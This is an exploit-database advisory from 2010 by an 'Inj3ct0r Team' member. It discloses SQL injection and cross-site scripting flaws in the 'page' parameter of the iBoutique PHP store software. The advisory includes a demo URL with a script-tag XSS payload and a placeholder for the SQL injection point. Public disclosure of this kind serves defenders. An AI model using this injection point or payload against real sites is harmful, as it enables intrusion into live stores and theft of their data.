ad

iBoutique (page) SQL Injection Vulnerability and XSS Vulnerability



EDB-ID: 13945 CVE: 2010-0804 OSVDB-ID: 62681
Author: L0rd CrusAd3r Published: 2010-06-20 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
1               ##########################################             1
0               I'm L0rd CrusAd3r member from Inj3ct0r Team            1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:iBoutique SQL Vulnerable & XSS Vulnerability 
Vendor url:http://www.netartmedia.net/iboutique/
Version:4	
Price:299$
Published: 2010-06-21
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team
Shoutzz:- To all ICW members

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:

iBoutique is a PHP ecommerce solution that allows you to setup and maintain your own estore. Features include simple user interface, easy product detail maintenance, shoping carts, template managing, statistic reporting, and much more. Code: PHP 4.0 

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~

Vulnerability:

*SQLi Vulnerability

DEMO URL :

http://server/iboutique/index.php?page=[sqli]

*XSS Vulnerability

DEMO URL:

Parameter:'"--><script>alert(0x000872)</script>

http://server/iboutique/index.php?page=[xss]


# 0day n0 m0re #
# L0rd CrusAd3r #